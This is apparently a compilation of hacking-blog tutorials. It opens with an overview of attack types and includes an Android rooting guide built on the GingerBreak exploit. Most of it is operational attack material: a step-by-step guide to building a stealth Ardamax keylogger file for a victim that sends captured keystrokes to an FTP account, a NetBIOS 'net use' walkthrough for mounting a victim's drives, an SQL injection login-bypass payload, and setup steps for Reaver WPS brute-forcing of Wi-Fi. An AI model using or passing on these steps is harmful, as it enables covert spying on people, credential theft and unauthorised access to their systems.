ENCRYPTION: FILES CAN BE ENCRYPTED IN A STORAGE. COMMUNICATION CHANNELS CAN BE ENCRYPTED AS WELL, COMMUNICATION CHANNEL ENCRYPTION ENCRYPTS THE ENTIRE COMMUNICATION PATH, SO ALL TRAFFICS SENT AND RECEIVED ARE ENCRYPTED, E.G. SSL TECHNOLOGY ENCRYPTS THE ENTIRE COMMUNICATION PATH. THERE ARE MANY WAYS HACKERS GET AWAY OF ENCRYPTED TRAFFIC & GET INFO IN NOT ENCRYPTED FORM. IF YOU ARE USING YOUR OWN ENCRYPTION METHOD, YOU ALWAYS SHOULD TEST YOUR ENCRYPTION FOR CRACKABILITY BEFORE YOU USE IT OFFICIALLY.

SNIFFERS: SNIFFERS IS A COMMON TOOL USED BY HACKERS. SNIFFERS LISTENS ON ANY TRAFFIC THAT GOES THROUGH THE WIRE OF THE TARGET SYSTEM, LISTENS INS AND OUTS TRAFFICS. PROMISCUOUS MODE IS A MODE THAT IS LISTENING FOR ANY TRAFFIC THAT GOES THROUGH THE WIRE. STANDARD PROMISCUOUS MODE SNIFFER IS A BASIC TECHNIQUE. THERE ARE MORE ADVANCED TECHNIQUES OTHER THAN PROMISCUOUS MODE. SNIFFING ENABLES THE ATTACKER TO PICK UP A PLAIN TEXT, AND OTHER SENSITIVE DATA THAT GOES ‘FROM’ OR ‘TO’ THE TARGET. SNIFFERS RECORD CAPTURED TRAFFIC, THEN AFTER YOU SNIFF YOU CAN GO OFFLINE & START ANALYZING THAT CAPTURED TRAFFIC. POPULAR SNIFFERS ARE ETHEREAL, ETHERAPE, ETTERCAP, AND NETWORK MONITOR(FOR WIN OS ONLY – NOT SO EFFECTIVE).

WIRELESS HACKING: THIS IS A NEW TECHNOLOGY & STARTS TAKING PLACE NOWADAYS. EASY TO SETUP, BUT NOT FREQUENTLY SECURED SINCE NOT MANY PEOPLE UNDERSTAND THE SECURITY CONFIGURATION, SO THEY DECIDE NOT TO SET IT UP OR SET IT UP POORLY. THERE ARE VARIOUS TOOLS THAT DETECT WIRELESS NETWORKS, POPULAR WAR DRIVING SOFTWARE ARE NETSTUMBLER, AIRSNORT, AIROPEEK, KISMET, AND MANY MORE. WHAT IS WAR DRIVING? GOOGLE IT!

SQL INJECTION: SQL INJECTION IS A TECHNIQUE THAT ALLOWS AN ATTACKER TO STEAL A VALUABLE DATABASE INFORMATION. THIS ATTACK RELIES ON POOR DATA VALIDATION AND POOR ERROR CHECKING.

BUFFER OVERFLOWS: BUFFER OVERFLOW IS COMMON, THE CAUSE OF BUFFER OVERFLOW IS POOR CODING. BUFFER OVERFLOWS MIGHT BE NOTICED WHILE CODING. BUFFER OVERFLOW HAPPENS WHEN THE PROGRAMMER DOES NOT CLEARLY DEFINE BOUNDARIES ON BUFFERS OR VARIABLES. WE USE OUT OF BOUND DATA TO INSERT MALICIOUS CODE OR EXECUTE COMMAND ON THE REMOTE HOST. BUFFER OVERFLOWS CAN CAUSE PROGRAMS TO FREEZE OR LOCKUP, CAN CAUSE MACHINE TO CRASH, OR LET YOU USE EXPLOITS & LEADS YOU TO COMPROMISE THE SYSTEM. TO BUILD BUFFER OVERFLOWS, YOU NEED A GOOD PROGRAMMING SKILLS, GOOD KNOWLEDGE OF STACK AND BUFFER VULNERABILITY.

YOU NEED TO HAVE THE ABILITY TO RESEARCH, ANALYZE VULNERABILITY& APPLY THE EXPLOIT TO ACHIEVE WHAT YOU WANT. BUFFER OVERFLOW IS A VERY COMMON & HARD TO PRODUCE AN APPLICATION WITH NO BUFFER OVERFLOWS AT ALL. THERE IS NOTHING PROGRAMMERS CAN DO ABOUT IT, THEY JUST NEED TO WRITE THE CODE WITH SECURITY MIND OF SET. IF UNEXPECTED BUFFER OVERFLOW APPEARS LATER BY CHANCE, PROGRAMMERS WILL HAVE TO FIX IT. PROGRAMMERS SHOULD TEST THEIR CODE FROM VULNERABILITIES AS MUCH AS THEY CAN BEFORE THEY PUBLISH THE APPLICATION.

ROOTKITS: IT IS A COMMON HACKER TECHNIQUE. ROOTKIT IS MALICIOUS PROGRAM THAT REPLACES COMPONENTS OF OS. IT DOES A STEALTH JOB. ROOTKIT REQUIRES ROOT PERMISSION, SO YOU CAN INSTALL IT. LINUX ROOTKITS ARE COMMON & YOU CAN FIND THEM EVERYWHERE, UNLIKE WINDOWS. IT IS VERY HARD TO DETECT A ROOTKIT BECAUSE IT EMBEDS ITSELF SO DEEPLY INTO THE TARGET SYSTEM. REMOVING ROOTKIT FROM A SYSTEM IS VERY HARD TOO, IF THE SECURITY PERSON TRIES TO REMOVE THE ROOTKIT OUT OF THE SYSTEM, HE WILL DESTROY THE SYSTEM SINCE THE ROOTKIT IS EMBEDDED SO DEEPLY INTO THE SYSTEM(INTO COMPONENTS OF OS). THE GOOD SOLUTION IS TO FORMAT THE WHOLE SYSTEM & INSTALL IT AGAIN.

SPOOFING: THE WORD SPOOFING DEFINED AS MAKING YOURSELF APPEAR AS SOMEBODY ELSE. EXAMPLES OF SPOOFING, YOU CAN SPOOF AN IP ADDRESS AND MAKE YOURSELF APPEAR TO BE SOMEWHERE ELSE, MAC ADDRESSES, AND EMAILS(VERY SIMPLE TO SPOOF, YOU SEND AN EMAIL TO SOMEBODY BY CHANGING THE HEADERS, AND THINGS LIKE THAT). SPOOF USUALLY RELIES ON POOR IMPLEMENTATION OF TCP/IP ITSELF OR POOR IMPLEMENTATION OF APPLICATIONS. TOOLS THAT ARE USED FOR SPOOFING DIFFERS FROM ONE PLATFORM TO ANOTHER. EXAMPLE OF THE TOOLS, IP SPOOFING UTILITIES, MAC ADDRESS MODIFIERS, ETC. SPOOFING IS MORE INTO USING YOUR SKILLS RATHER THAN USING A TOOL.

DENIAL OF SERVICE (DOS): DOS IS VERY COMMON. THE ULTIMATE IDEA IS TO PREVENT LEGITIMATE USERS FROM USING THE SYSTEM. RUNNING DOS IS VERY SIMPLE, YOU DON’T GAIN ANYTHING FROM DOING DOS. HACKERS DO IT TO THREAT COMPANIES, THINGS LIKE THAT. MANY METHODS/LEVEL OF DOS ATTACKS EXIST. EXAMPLES OF SOME WAYS OF TO DOS, PING OF DEATH, WINDOWS SIZE OVERFLOW, SMURF, TEARDROP ATTACKS, AND MANY MORE. THERE ARE LOTS OF DIFFERENT WAYS TO DO IT!

WEB HACKING: WEB HACKING IS THE MOST POPULAR ATTACKS. IT IS BASED ON HACKING INDIVIDUAL SITES, SERVERS, OR COMPONENTS BASED ON THE WEBSITE. FIRST STEP A HACKER TAKES IS, ENUMERATE SERVICES(APPLICATIONS) ON TARGET MACHINE, AND THEN DETERMINE WHAT WEBSERVER SOFTWARE(APACHE, IIS, ETC) IS RUNNING ON THE TARGET SYSTEM. AFTER THAT, THE HACKER EXPLOITS AGAINST VULNERABILITY. FOUND IN THE TARGET SYSTEM. IT WILL BE EASIER TO HACK IF THE HACKER KNOWS THE VERSION OF THE SERVICE/SOFTWARE RUNNING.

A WEBSERVER ATTACK LEADS TO DEEPER PENETRATION ON THE NETWORK(MOVE INTO THE TARGET’S INTERNAL NETWORK). POPULAR ATTACK METHODS ARE XXS(CROSS-SITE SCRIPTING), IIS DLL VULNERABILITIES(IIS IS VERY COMMONLY EXPLOITED), DIRECTORY TRAVERSAL, UNICODE ATTACK, AND MANY MORE.
WHAT IS UNICODE ATTACK?
HERE IS QUICK ROUGH DESCRIPTION ABOUT UNICODE ATTACK, LETS SAY YOU WANT TO PASS SPACE INTO A URL. IF YOU PUT A SPACE IN URL, WEBSERVER WILL NOT TAKE YOUR URL, WEBSERVER WILL CONSIDER THE URL IS INVALID. THUS, IF YOU WANT TO PUT SPACES AMONG THE URL, YOU SHOULD PUT THE NUMBER 20 IN A PLACE OF THE SPACE(NUMBER 20 REPRESENTS THE SPACE), SO WHEN THE URL GOES TO THE WEBSERVER, THE WEBSERVER SAYS OK! THAT’S A VALID URL, LETS PROCESS IT AND SO IT DOES. UNICODE ATTACK USES THIS TECHNIQUE IN A NON-STANDARD(BAD WAY) WAY TO ATTACK THE WEBSERVER. THAT’S A QUICK EXPLAINATION ABOUT UNICODE ATTACK.

I’M ALREADY ABOUT TO FINISH THIS TUTORIAL, I WILL JUST TALK ABOUT POPULAR TOOLS IN A BRIEF MANNER. I WILL START WITH NAMP.

NMAP IS THE MOST POPULAR HACKER TOOL OUT HERE. LINUX COMMAND LINE NMAP WORKS BETTER AND IS SUPPORTED BETTER. NMAP COMES WITH PING UTILITY, PORT SCANNING UTILITY, SERVICE ENUMERATION & OS FINGERPRINTING.

SUPERSCAN IS A WINDOWS BASED TOOL DEVELOPED BY FOUNDSTONE INC. ITS EASY TO USE IT & A GOOD TOOL FOR WINDOWS.

NESSUS IS USED FOR VULNERABILITY ASSESSMENT. IT IS AN OPEN SOURCE SOFTWARE KIT, WITH COMMERCIAL VERSION AVAILABLE AS WELL. NESSUS USES CLIENT/SERVER ARCHITECTURE. SERVER WILL BE INSTALLED ON A CENTRAL LOCATION. NESSUS COMES IN GUI & COMMAND LINE INTERFACE. NESSUS USES DATABASE THAT CARRIES LATEST CURRENT EXPLOITS FOR ALL TYPES OF OS & APPLICATION. DATABASES IN NESSUS ARE CALLED PLUG-INS, HUNDREDS OF VULNERABILITY PLUG-INS EXIST AND ARE UPDATED DAILY TO INCLUDE LATEST EXPLOITS. NESSUS REQUIRES HIGH LEVEL OF KNOWLEDGE TO USE THE TOOL VERY EFFICIENTLY. YOU CAN GO OUT TO THE WEB AND DOWNLOAD AN EXPLOIT AND THEN ADD IT TO THE DATABASE. NESSUS CAN TAKE QUITE LONG TIME TO DO VULNERABILITY ASSESSMENT.

FINALLY, THE INFORMATION IN THIS TUTORIAL HAVE BEEN GATHERED FROM VARIOUS TYPES OF SOURCES, AND THEN I WROTE THE TUTORIAL IN AN ORGANIZED MANNER FROM SCRATCH AS WELL AS I ADDED SOME STUFF & CLARIFIED MANY PARTS.

AFTER YOU HAVE READ THIS TUTORIAL, I RECOMMEND YOU TO SEARCH AND LEARN ABOUT WINDOWS NULL SESSIONS, IT IS THE MOST CRITICAL FLAWS ASSOCIATED WITH WINDOWS OS, AND GOOGLE ABOUT DNS ZONE TRANSFERS!

THIS TUTORIAL IS A GOOD GUIDE FOR YOU THAT GIVES YOU AN INSIGHT ON HOW TO START & DIFFERENT TECHNIQUES THAT HACKERS USE AND HOW THEY ARE USED. I HOPE YOU HAVE ENJOYED THIS TUTORIAL & HELPED YOU IN SOMEWAY OR ANOTHER. I’M NOT SUPPORTING ANY ILLEGAL ACTIVITIES. THIS TUTORIAL FOR PEOPLE WHO WANTS TO KNOW HOW HACKERS THINK, WHAT STEPS THEY TAKE TO BREAK INTO SYSTEMS & HOW THEY DO IT, SO PEOPLE CAN HAVE AN INSIGHT ON HOW TO PROTECT THEMSELVES AGAINST INTRUDERS.

Rooting Your Android Phone

Read it completely before you start doing anything)
Rooting, for those of you that don’t know, means giving yourself root permissions on your phone. It’s similar running programs as administrators in Windows, or running a command with sudo in Linux. With a rooted phone, you can run more apps (like backup or tethering apps ), as well as flash custom ROMs to your phone, which add all sorts of extra features.

There are a ton of different
Android phones out there, and while some rooting methods might work for multiple phones, there is
no one-size-fits-all guide for rooting every phone out there. As such, we can’t show you how to root every phone in existence,
especially since we can’t test every method.
Rooting Terms
Root:
Rooting means you have
root access to your device—that
is, it can run the sudo command, and has enhanced privileges allowing it to run
apps like Wireless Tether or
SetCPU. You can root either by installing the Superuser application—which many of the below root processes include—
or by flashing a custom ROM that has root access included.
ROM :
A ROM is a modified
version of Android. It may
contain extra features, a
different look, speed
enhancements, or even a
version of Android that hasn’t been released yet. We won’t discuss ROMs in depth here,but if you want to use one once
you’re rooted, you can read
more about doing that on this page .
Flash:
Flashing essentially
means installing something on your device, whether it be a ROM, a kernel , or something else that comes in the form of a ZIP file. Sometimes the rooting
process requires flashing ZIP file, sometimes it doesn’t.
Bootloader:
Your bootloader is
the lowest level of software on your phone, running all the code that’s necessary to start up your operating system.
Most bootloaders come locked, which keeps you from rooting your phone. Unlocking your bootloader doesn’t root your phone directly, but it does
allow you to root, then flash custom ROMs if you so desire.
Recovery : Your recovery is
the software on your phone
that lets you make backups,
flash ROMs, and perform other system-level tasks. The default
recoveries can’t do much, but you can flash a custom
recovery—like ClockworkMod
—after you’ve unlocked your bootloader that will give you much more control over your
device. This is often an integral
part of the rooting process.
ADB:
ADB stands for Android
Debug Bridge, and it’s a
command line tool for your
computer that can
communicate with an Android device you’ve connected to it.
It’s part of the Android
Software Developers Kit (SDK) . Many of the root tools below use ADB, whether you’re
typing the commands yourself or not. Unless the instructions call for installing the SDK and
running ADB commands, you won’t need to mess with it— you’ll just need to know that it’s what most of the tools use to root your phone.
S-OFF :
HTC phones use a
feature called Signature
Verification in HBOOT, their
bootloader. By default, your phone has S-ON, which means
it blocks you from flashing
radio images—the code that manages your data, Wi-Fi, and GPS connections. Switching your phone to S-OFF lets you flash new radios. Rooting
doesn’t require S-OFF, but
many rooting tools will give
you S-OFF in addition to root access, which is nice.
RUU and SBF: ROM Upgrade
Utilities (for HTC phones) and
System Boot Files (for Motorola
phones) are files direct from
the manufacturer that change
the software on your phone.
RUU and SBF files are how the
manufacturers deliver your
over-the-air upgrades, and
modders often post leaked RUU
and SBF files for flashing when
the updates haven’t been
released yet. They’re also
handy when downgrading your phone, if a rooting method isn’t available for the newest software version yet. You can flash RUUs right from your HTC phone, but Motorola users will need a Windows program called RSD Lite to flash SBF files.
There are basically three ways to root your android phone !
1.using commands from PC
2.using softwares from phone !
3.booting using device specific .zip file(recovery mode)
But out of these 1st and the 3rd works fine on the most of the android devices !
(IMP: before using any of these methods please turn on your usb debugging from your android device
Application=settings=applications=development=check usb debugging)
Method 1.using commands from pc !
You need not to do original commands as
There is software that runs fine !
“Superoneclick”
You can download officially it here !
DOWNLOAD

Before you run make sure that you have android SDK installed on your PC.
While installing please allow default path specified in SDK…
You can find it on google developers site !
(Just sdk should be installed no more components are needed)
Method 2: using an app for rooting your android !
There are many apps available at Market place for doing this !
ginger break is trusted one and works on most of devices !
but if it didn’t worked try our 1st method of rooting !
Gingerbreak :
exlusively for gingerbread android rooting ,
About
The GingerBreak APK is a wrapper around the newly released GingerBreak exploit (credits to The Android Exploid Crew), which is meant to attain root access on GingerBread. This specific exploit may work on various Froyo and Honeycomb versions as well.
What the APK and exploit do is as follows:
– The APK puts the right files in the right place to run the exploit
– The APK runs the exploit
– The exploit attempts to attain root access
– If it succeeds, the exploit remounts /system as read-write and runs the installer script
– The installer script attempts to install the su binary and superuser APK, and reboots
Some important things to know:
– You must have USB debugging enabled on your device
– You need to have an SD card (formatted and) inserted – if it doesn’t work, try formatting the SD card in your computer, or switching it with a different (or old, etc) SD card
– The APK must be installed to device, NOT SD card
– The exploit may take a while to run, but not more than 10 minutes, if it does, get me a logcat, and reboot the device. In rare occasions, even if the device does not reboot, you may still have root. So check that out after you manually pull battery after 15 minutes or so of being stuck.
– Always reboot between root attempts!
– While (temporary?) root access may be attained, due to locked bootloaders, efuses, S-ON, and whatnot this may still not work on your device. For temproot purposes, use the raw binary exploit (linked below), not this APK.
– The GingerBreak exploit should not be used to attain temproot and continue using the device. It fscks vold, you do not want to be running like that. You want to reboot! So if the root doesn’t stick, you (still) have a problem.
Installation
– Make sure USB debugging is enabled
– Make sure you have an SD card (formatted and) inserted
– Get the APK on the phone somehow, and install it
– Open the APK, press the root button
– Wait a few minutes. If there are no problems, the device will reboot (note that the reboot itself can take like 10 minutes due to cache wipe)
– Make sure the Superuser app is install and working !!!
WARNING: Apparently on some devices the root exploit causes the SD card (internal or external) to be formatted. Also, if it gets stuck but you do see the card mounting/unmounting, try formatting your SD card yourself and try again (or use a different SD card) – often this works (a fix for both issues is being looked at)

Download Gingerbreak v1.20 :
DOWNLOAD HERE

Keylogger

All about Keylogging

(Note – I highly recommend that you read this post completely since every single piece of information is important)

This is a DETAILED tutorial to tell you all possible information about Keylogger & Keylogging


1. What is a Keylogger?

A keylogger is also called a spysoftware is a small program that records each and every …keystroke a user types on a specific computer’s keyboard. A keylogger program canb e installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.
2. How Keylogger works?

Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC.
Let’s take up a small example: The victim goes to http://www.gmail.com/ and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the gmail login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke. Some keyloggers also give a screen-shot of Your computer background.

Types of Keyloggers

1-Hardware Keylogger – A plug-in device or a hardware circuit can be used as keylogger tools. Either of the two can log to their internal memories all of a user’s keyboard activities.

2-Software Keylogger- The software keylogger needs to be installed on the Victims computer to work

4-Once I install the keylogger can the victim come to know about it’s presence?

No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.But if the Victim is Wise he may run a system scan or he may also see the process then he rocks and you are fool
5-Can I be traced back if I install the keylogger on some other computer?

No, For a Man with no knowledge about computer and keylogger or even a man who know;s this cannot trace you back.
6- Which keylogger is the best?

Number of keyloggers are available but the best I used till now for me is Ardamax Keylogger
DOWNLOAD NOW

Tutorial for Creating the Keylogger Remote file for begginers:

(KISS-“keep it short and simple”)

STEP 1: Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…’,

click ‘Next’
STEP 2:Now,you should see this.

STEP 3: If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

STEP 4 : Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.

STEP 5 : Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.

STEP 6: Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’.. Or else SkIp this also

STEP 7:untik the update optiong

STEP 8: Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date

STEP 9: Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:

STEP 10 :Now you should be at ‘FTP’, create a free account at http://www.drivehq.com/ ” then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
http://FTP.DriveHQ.com/
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:

Now Click ‘Test’ and it should pop up like this

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

STEP 11: You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

STEP 12: Now you can change name and icon your Keylogger Engine as you want it to look like.
just click ‘Finish’.

STEP 13:After you click ‘Finish’ you should see this

Now Your Remote File Is Created

11 COOL HACKING MOVIES OF HOLLYWOOD

n the list of Computer movies we have brought to you the top hollywood movies based on hacking. These hacker movies just show up the cool way to represent life and happenings in the life of a hacker. Thus if you are interested in hacking stuff, don’t forget to have a look on these hacking movies.

1. Die Hard 4: Live Free or Die Hard (2007)

John McClane takes on an Internet-based terrorist organization who is systematically shutting down the United States.

Rating : 5.9/10
Director: Len Wiseman
Stars : Bruce Willis, Justin Long and Timothy Olyphant.

2. Hackers (1995)

A young boy is arrested by the US Secret Service for writing a computer virus and is banned from using a computer until his 18th birthday.

Rating : 5.9/10
Director: Iain Softley
Stars: Jonny Lee Miller, Angelina Jolie and Jesse Bradford

3. Pirates of Silicon Valley (1999)

Pirates of Silicon Valley is a semi-humorous documentary about the men who made the world of technology what it is today, their struggles during college, the founding of their companies, and the ingenious actions they took to build up the global corporate empires of Apple Computer Corporation and Microsoft Inc.

Rating: 7.1/10
Director: Martyn Burke
Stars: Anthony Michael Hall, Noah Wyle and Joey Slotnick

4. The Italian Job (2003)

After being betrayed and left for dead in Italy, Charlie Croker and his team plan an elaborate gold heist against their former ally.

Rating: 6.9/10
Director: F. Gary Gray
Stars: Donald Sutherland, Mark Wahlberg and Edward Norton.

5. Untraceable (2008)

FBI agent Jennifer Marsh is tasked with hunting down a seemingly untraceable serial killer who posts live videos of his victims on the Internet. As time runs out, the cat and mouse chase becomes more personal.

Rating: 6.1/10
Director: Gregory Hoblit
Stars: Diane Lane, Colin Hanks and Joseph Cross.

6. Foolproof (2003)

Kevin, Sam and Rob are founding members of a theoretical group which pulls off heists. Leo, a gangster, blackmails them into pulling off a real multi-million dollar heist. Now it’s up to them to get out alive.

Rating: 6.5/10
Director: William Phillips
Stars: Ryan Reynolds, Kristin Booth and Joris Jarsky.

7. Firewall (2006)

A security specialist is forced into robbing the bank that he’s protecting, as a bid to pay off his family’s ransom.

Rating: 5.7/10
Director: Richard Loncraine
Stars: Harrison Ford, Virginia Madsen and Paul Bettany.

8. The Score (2001)

An aging thief hopes to retire and live off his ill-gotten wealth when a young kid convinces him into doing one last heist.

Rating: 6.8/10
Director: Frank Oz
Stars: Robert De Niro, Edward Norton and Marlon Brando.

9. Swordfish (2001)

A secretive renegade counter-terrorist co-opts the world’s greatest hacker (who is trying to stay clean) to steal billions in US Government dirty money.

Rating: 6.4/10
Director: Dominic Sena
Stars: John Travolta, Hugh Jackman and Halle Berry.

10. Sneakers (1992)

Complex but lighthearted thriller about computers and cryptography, government and espionage, secrets and deception and betrayal.

Rating: 7.0/10
Director: Phil Alden Robinson
Stars: Robert Redford, Dan Aykroyd and Sidney Poitier.

11.The Social Network (2010)

Harvard student Mark Zuckerberg creates the social networking website that would become known as Facebook, but is later sued by two brothers who claimed he stole their idea, and the co-founder who was later squeezed out of the business.

Rating: 7.9/10

Director: David Fincher
Stars: Jesse Eisenberg, Andrew Garfield and Justin Timberlake.

We hope you will like the above collection. You are most welcome with your comments if you are having some more movies like that in your mind. Enjoy people and do not forget to comment.

How to hack other computer using command prompt

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

WHAT IS SQL INJECTION?

WHAT IS SQL INJECTION?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

SQL Injection: An In-Depth Explanation

Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.

SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.

Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.

These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

SQL Injection: A Simple Example

Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum.

When the legitimate user submits his details, an SQL query is generated from these details and submitted to the database for verification. If valid, the user is allowed access. In other words, the web application that controls the login page will communicate with the database through a series of planned commands so as to verify the username and password combination. On verification, the legitimate user is granted appropriate access.

Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login form barrier and seeing what lies behind it. This is only possible if the inputs are not properly sanitised (i.e., made invulnerable) and sent directly with the SQL query to the database. SQL Injection vulnerabilities provide the means for a hacker to communicate directly to the database.

The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to perform an SQL Injection hacking attack is a web browser, knowledge of SQL queries and creative guess work to important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity.

What Is The Impact Of SQL Injection?

Once an attacker realizes that a system is vulnerable to SQL Injection, he is able to inject SQL Query / Commands through an input form field. This is equivalent to handing the attacker your database and allowing him to execute any SQL command including DROP TABLE to the database!

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to manipulate existing queries, to UNION (used to select related information from two tables) arbitrary data, use subselects, or append additional queries.

In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures, it could spell disaster.

Unfortunately the impact of SQL Injection is only uncovered when the theft is discovered. Data is being unwittingly stolen through various hack attacks all the time. The more expert of hackers rarely get caught.

Example Of A SQL Injection Attack

Here is a sample basic HTML form with two inputs, login and password.

<form method=”post” action=”http://testasp.acunetix.com/login.asp”&gt;

<input name=”tfUName” type=”text” id=”tfUName”>

<input name=”tfUPass” type=”password” id=”tfUPass”>

</form>

The easiest way for the login.asp to work is by building a database query that looks like this:

SELECT id

FROM logins

WHERE username = ‘$username’

AND password = ‘$password’

If the variables $username and $password are requested directly from the user’s input, this can easily be compromised. Suppose that we gave “Joe” as a username and that the following string was provided as a password: anything’ OR ‘x’=’x

SELECT id

FROM logins

WHERE username = ‘Joe’

AND password = ‘anything’ OR ‘x’=’x’

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause.

The ‘x’=’x’ part guarantees to be true regardless of what the first part contains.

This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!

Learn to Hack WIFI password with Ubuntu (WPA/WPA2)

In this hacking tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS, Which is Wireless Protected Setup. This type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router’s PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as, You can always have the Wireless Password even if It’s changed by knowing the PIN number.

Steps To Hack WPA/WPA2 Passwords using Ubuntu (Reaver)

Follow these simple steps.

Step 1 (Setting up Reaver 1.4 )

1) Open terminal and type

sudo -s

and then type your password.

2) Download Reaver (Better Download the Latest Version ) Place in a specified folder.

3) Open the Terminal and type

tar xvfz reaver-1.4.tar.gz

4) Install dependencies

sudo apt-get install libpcap-dev

then

sudo apt-get install libsqlite3-dev

Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.

5) Enter the folder by typing

cd reaver-1.4/src

6) Type

./configure

7) Type

make

8) Type

 make install

